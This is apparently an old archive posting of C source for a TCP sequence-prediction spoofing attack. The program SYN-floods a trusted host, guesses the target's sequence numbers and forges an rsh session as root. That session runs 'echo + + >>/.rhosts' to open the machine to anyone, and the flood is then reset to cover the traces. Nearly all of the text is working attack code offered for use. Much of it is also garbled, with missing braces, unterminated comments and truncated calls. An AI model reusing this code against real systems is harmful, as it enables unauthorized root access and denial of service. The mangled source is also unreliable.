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Posted Dec 21, 1999


tags | encryption
SHA-256 | 0771a224588405795de8f8c502f69daba99c32d9e0f510fa659a2278224911c1


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/* This code is eleet.. Treat is as such.*/ 
#include <stdio.h>
#include <setjmp.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <net/if.h>
#include <netinet/if_ether.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <netdb.h>

#include "ipbpf.h" /* Include ipbpf header */

#define BADHOST ""
/* The host to spoof flooding the trusted
* host's destination port from. This host shouldn't exist, but should have
* correct routing entries. The important part is so that returned packets
* go to nowhere.

#define NUMSEQUENCE 80
/* The number of connections to spoof from BADHOST. I made this big.
* I've found 4.4BSD will be flooded with only 8 unacked connections. Your
* mileage may vary

#define NUMTESTS 10
/* How many samples of the sequence numbers do you want to take?
* I randomly picked 10 and only take the last result. If I wanted to be
* elegant, I'd do some sort of statistical average. Sequence numbers
* are generally updated by a fixed number, this attempts to compute
* this number taking into account average network lag. Fixed sequence
* number updating currently works on: Solaris 2.x, NeXTstep, 4.4BSD, and
* probably others, although I haven't tested them.

#define ROUTER "router.EnGarde.com"
/* The name of your router to the outside world. Spoofed packets need to
* be sent to it's ether/fddi address in order to get to the outside world.

main(argc, argv)
int argc;
char *argv[];

struct hostent *he;
u_long trust_addr, targ_addr;
u_long seq_num[NUMSEQUENCE], port_num[NUMSEQUENCE];
u_long next_seq, offset;

if (argc!=3) {
fprintf(stderr, "Usage: %s trusted-host target\n",argv[0]);
if ((he=gethostbyname(argv[1]))==NULL) {
if (trust_addr==(u_long)-1) {
fprintf(stderr, "Unknown host %s\n", argv[1]);
} else
bcopy(he->h_addr, &trust_addr, 4);

if ((he=gethostbyname(argv[2]))==NULL) {
if (targ_addr==(u_long)-1) {
fprintf(stderr, "Unknown host %s\n", argv[2]);
} else
bcopy(he->h_addr, &targ_addr, 4);

printf("Initializing Packet Filter\n");
use_best(); /* Use the best packet filter available on this system */
if (init_filter("tcp", NULL)) {
/* Initialize the packet filter and read only TCP packets */
fprintf(stderr, "Can't init Packet Filter\n");

/* First, send NUMSEQUENCE connection requests from BADHOST to the
* trusted host on a trusted port (currently 513). Trusted host will
* attempt to SYN-ACK these. If BADHOST doesn't exist, there will never
* be a response ACK. Consequently, trusted host's connection queue will
* fill and it will no longer respond to any packets to port 513.

printf("[Hosing Trusted Host...]\n");
if (hose_trusted(argv[1], trust_addr, seq_num, port_num)) {
fprintf(stderr, "Couldn't hose %s\n", argv[1]);

/* Next, do a sampling of the difference in sequence numbers. These packets
* are NOT spoofed as receiving the reply is required. Consequently, this
* host can appear in any packet traces.
printf("[Determining sequence numbers...]\n");
if (determine_sequence(argv[2], targ_addr, &next_seq, &offset)) {
fprintf(stderr, "Couldn't determine sequence numbers for %s\n", argv[2]);

printf("=>Next sequence number is: %u, offset is: %u\n", next_seq, offset);

/* Next, do the actual spoofed connection, now that we know what the next
* sequence number will be.
printf("[Spoofing Connection...]\n");
if (spoof_connection(trust_addr, argv[2], targ_addr, next_seq)) {
fprintf(stderr, "Couldn't spoof connection to %s\n", argv[1]);

/* Finally, reset all of the half started connections on trusted-host.
* This will put trusted-host back into it's normal state (and hide
* the traces that it was used for evil.
printf("[Cleaning Up Trusted Mess...]\n");
if (reset_trusted(argv[1], trust_addr, seq_num, port_num)) {
fprintf(stderr, "Couldn't reset %s. Sucks to be it.\n", argv[1]);

/* fin */

hose_trusted(trust_host, trust_addr, seq_num, port_num)
char *trust_host;
u_long trust_addr;
u_long seq_num[NUMSEQUENCE];
u_short port_num[NUMSEQUENCE];
int i;
u_long start_seq=49358353+getpid(); /* Make this anything you want */
u_long start_port=600; /* Make this anything you want */
struct ether_header eh;
u_long bad_addr;

/* First attempt to find the hardware address of the trusted host */
if (ether_hostton(trust_host, &eh.ether_dhost)) {
/* If that fails, find the hardware address of the router */
if (ether_hostton(ROUTER, &eh.ether_dhost)) {
fprintf(stderr, "Can't determine ether addr of trusted host or router.\n");

if ((bad_addr=inet_addr(BADHOST))==(u_long)-1) {
fprintf(stderr, "Can't convert BADHOST address.\n");

/* Send a whole bunch of spoofed SYNs. Arguments to sendtcppacket_simple
* are:
* sendtcppacket_simple(
* struct ether_addr source_hardware_address,
* struct ether_addr destination_hardware_address,
* u_long source_ip_address,
* u_long destination_ip_address,
* u_short source_port,
* u_short destination_port,
* u_long sequence_number,
* u_long acknowldegement_number,
* int TCP flags (SYN, RST, ACK, PUSH, FIN),
* char * data,
* int datalen)
for (i=0;i<NUMSEQUENCE;i++) {
port_num[i]=start_port++; /* record the ports and sequence numbers */
seq_num[i]=start_seq++; /* for later reseting */

sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
bad_addr, trust_addr,
port_num[i], 513, /* 513 is rlogin/rsh port */
seq_num, 0,

jmp_buf env;

void timedout()
longjmp(env, 1);

determine_sequence(targ_host, targ_addr, next_seq, offset)
char *targ_host;
u_long targ_addr, *next_seq, *offset;
struct hostent *he;
struct ether_header eh, eh2;
struct ip iph;
struct tcphdr tcph;
int i;
u_long start_seq=4138353+getpid(); /* Make this anything you want */
u_long start_port=600; /* Make this anything you want */
u_long my_addr;
char buf[80];
u_long prev_seq=0, diff=0;

/* first attempt to get the destination's hardware address */
if (ether_hostton(targ_host, &eh.ether_dhost)) {
/* If that fails, get the router's hardware address */
if (ether_hostton(ROUTER, &eh.ether_dhost)) {
fprintf(stderr, "Can't determine ether addr of trusted host or router.\n");

gethostname(buf, 79);
if ((he=gethostbyname(buf))==NULL) {
fprintf(stderr, "Can't get my hostname!?\n");
bcopy(he->h_addr, &my_addr, 4);
for (i=0;i<NUMTESTS;i++) {
/* Do a setjmp here for timeouts */
if (setjmp(env))
fprintf(stderr, "Response Timed out... Resending...\n");
signal(SIGALRM, timedout);
alarm(10); /* Wait 10 seconds for reply */
sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
my_addr, targ_addr,
start_port, 514, /* 514 is rsh port */
start_seq, 0,
/* Send connection request packet */

for (;;) {
/* Wait until the reply is received. Arguments for readpacket
* are:
* readpacket(
* struct fddi_header fddi_header,
* struct ether_header ether_header,
* struct ip ip_header,
* struct udphdr udp_header,
* struct tcphdr tcp_header,
* char * data,
* int datalen)
* return type is the type of packet read

while (readpacket(NULL, &eh2, &iph, NULL, &tcph, NULL, NULL)!=
if (ntohs(tcph.th_dport)==start_port &&
ntohs(tcph.th_sport)==514) {
/* If the ports match, it's probably a reply--this isn't
* definite, but it's a pretty good guess .
* The following attempts to generate a reliable sequence.
* Actually, it's pretty dumb. It tries 10 times, then takes
* the last result. Generally, I've found this to work well
* enough to warrant not writing anything smarter.
if (prev_seq) {
printf("(prev=%u, new=%u, diff=%u\n", prev_seq,
tcph.th_seq, diff);
} else
if (*offset==0)
else {
if (*offset!=diff)
printf("Difference in Offset: old=%u, new=%u\n",
*offset, diff);
&(eh.ether_shost), &(eh.ether_dhost),
my_addr, targ_addr,
start_port++, 514,
start_seq++, 0,
/* Send a reset to close the connection. Note, this
* automatically will be sent by localhost unless
* a service is listening on whatever port you've
* chosen to start with at the top of this routine.
* so I reset it anyway
break; /* out of infinite for */
} /* of infinite for */
} /* for i=0 i<numtests... */

spoof_connection(trust_addr, targ_host, targ_addr, next_seq)
u_long trust_addr, targ_addr, next_seq;
struct ether_header eh;
char buf[80];
struct hostent *he;
u_long my_addr;
u_short port=513;
char *string="0\0root\0root\0echo + + >>/.rhosts\0";
int stringlen=32;
u_long seq=385773357;
int i;

/* As before, get the target's hardware address */
if (ether_hostton(targ_host, &eh.ether_dhost)) {
/* If that fails, get the router's hardware address */
if (ether_hostton(ROUTER, &eh.ether_dhost)) {
fprintf(stderr, "Can't determine etheraddr of target host or router.\n");

/* Send a syn with our own sequence number */
sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
trust_addr, targ_addr,
port, 514,
seq++, 0,
usleep(5000); /* wait for the other side to SYN,ACK */

/* Send the ACK for the sequence number we guessed. I've found we guess
* right about 90% of the time
sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
trust_addr, targ_addr,
port, 514,
seq, ++next_seq,

/* Now, send our rsh request with the proper sequence and ACK nubmers */
sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
trust_addr, targ_addr,
port, 514,
seq, next_seq,
TH_ACK, string, stringlen);

sleep(1); /* Wait for it to be received, ACKd, and processed */
/* Send a fin with the our new sequence number and their sequence number */
sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
trust_addr, targ_addr,
port, 514,
seq, next_seq,

for (i=1;i<4;i++) { /* Send a bunch of ACKs */
/* If we screwed up the guessing the correct sequence number the remote
* host is using, guess a whole bunch more just to be sure. We could
* probably reset the connection, but it's better to have the
* net software hang waiting for a proper FIN/ACK than have the
* application that we've spoofed into running exit because we
* reset the connection.
sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
trust_addr, targ_addr,
port, 514,
seq+1, next_seq+i,
usleep(50000); /* Finally, send a RST */
/* Now, if we're really screwed, and ~8 seconds later we haven't guessed
* the right sequence number, just reset the connection. Hopefully by now
* the application has done it's job, so resetting shouldn't cause any
* problems.
sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
trust_addr, targ_addr,
port, 514,
seq+1, next_seq+4,


reset_trusted(trust_host, trust_addr, seq_num, port_num)
u_long trust_addr;
u_long seq_num[NUMSEQUENCE], port_num[NUMSEQUENCE];
struct ether_header eh;
u_long bad_addr;
int i;

if (ether_hostton(trust_host, &eh.ether_dhost)) {
if (ether_hostton(ROUTER, &eh.ether_dhost)) {
fprintf(stderr, "Can't determine ether addr of trusted host or router.\n");

if ((bad_addr=inet_addr(BADHOST))==(u_long)-1) {
fprintf(stderr, "Can't convert BADHOST address.\n");

/* Reset all of the connections we started before */
for (i=0;i<NUMSEQUENCE;i++) {
sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
bad_addr, trust_addr,
port_num[i], 513,
seq_num[i], 0,
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